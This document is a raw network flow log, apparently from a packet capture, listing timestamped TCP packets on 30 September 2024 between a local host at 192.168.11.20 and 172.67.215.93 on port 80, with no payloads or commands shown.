Sep 30, 2024 15:10:14.620696068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.620732069 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.620732069 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.620774031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.620903969 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.621071100 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.621078014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.621140003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.621201992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.621243954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.621368885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.621412039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.621412039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.621598005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.621630907 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.621789932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.621799946 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.621845007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.621970892 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.622072935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.622139931 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.622359037 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.622472048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.622483969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.622555017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.622627974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.622679949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.622797966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.622797966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.622967958 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.632105112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.632121086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.632246017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.632406950 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.632457972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.632522106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.632522106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.632524014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.632766008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.632827044 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.632838964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.632863045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.633042097 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.633042097 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.633042097 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.633042097 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.633042097 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.633117914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.633219957 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.633238077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.633363008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.633414030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.633415937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.633548975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.633929968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.633929968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.633929968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.634592056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.634695053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.634747028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.634815931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.634928942 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.634943962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.635309935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.635720968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.636014938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.636069059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.636081934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.636082888 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.636225939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.636277914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.636445999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.636445999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.636921883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.637027025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.637094021 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.637152910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.637264967 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.637288094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.637325048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.637434959 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.637434959 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.637651920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.638314962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.638360023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.638447046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.638500929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.638551950 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.638605118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.638634920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.638634920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.638804913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.638804913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.639424086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639528990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639585018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639667988 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639724016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639736891 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.639750957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639769077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639786005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639832973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639904022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639930964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.639930964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.639930964 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.639971018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.639987946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640007019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640024900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640201092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640218973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640235901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640254974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640285015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640305042 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640321970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640340090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640357018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640373945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.640634060 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.640646935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.640646935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.640646935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.640646935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.640646935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.640646935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.640822887 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.641546965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641597033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641613960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641644955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641661882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641679049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641695976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641712904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641731024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641747952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641765118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641783953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641801119 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641824007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.641844034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641860962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641880035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641897917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641916037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641932964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.641956091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642004967 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.642422915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642469883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642487049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642550945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642596006 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642613888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642668009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642705917 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.642705917 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.642707109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.642707109 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.642749071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642767906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642786026 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.642896891 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.643090963 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.643275976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643372059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643425941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643460035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643495083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643553019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643572092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643589973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643620968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643675089 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643702984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.643702984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.643718004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643841028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643861055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643877983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643881083 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.643903017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643919945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643937111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643954992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.643997908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644052029 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644072056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644074917 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.644074917 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.644104958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644124031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644140959 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644159079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644283056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644300938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644320011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644336939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644355059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644648075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644699097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644766092 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.644766092 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.644766092 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.644766092 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.644766092 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.644790888 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.644809008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644828081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644846916 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644865036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644882917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644901037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644948959 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644954920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.644954920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.644979000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.644998074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645055056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645072937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645091057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645109892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645128965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645148039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.645148039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.645173073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645191908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645210028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645227909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645245075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645278931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645342112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645359993 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645376921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645428896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645669937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.645669937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.645669937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.645669937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.645848036 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.645903111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645952940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645971060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.645987034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646003008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646018028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646034002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646064043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646080017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646096945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646111965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646127939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646142960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646161079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646631002 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.646631002 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.646631002 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.646677971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646719933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646738052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646755934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.646775961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.647469997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.647469997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.647608995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.647629976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.647650003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.647670031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.647689104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.648160934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.648216963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.648279905 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.648333073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.648403883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.648483992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.648483992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.648861885 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.648991108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.649111986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.649158955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.649230957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.649276972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.649627924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.649627924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.649627924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.649652958 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.650449991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.650500059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.650518894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.650537014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.650578976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.650671005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.650732994 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.650878906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.650927067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.650949001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.650970936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.650990963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.651449919 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.651449919 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.651582956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.651704073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.651756048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.651846886 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.651885986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.652476072 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.652476072 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.652476072 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.652499914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.653879881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.653913975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.653974056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654016972 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.654036999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654057980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654103041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654187918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.654254913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654311895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654334068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654357910 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.654522896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654527903 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.654527903 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.654527903 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.654581070 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654601097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654620886 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654640913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.654660940 CEST	80	49754	172.67.215.93	192.168.11.20
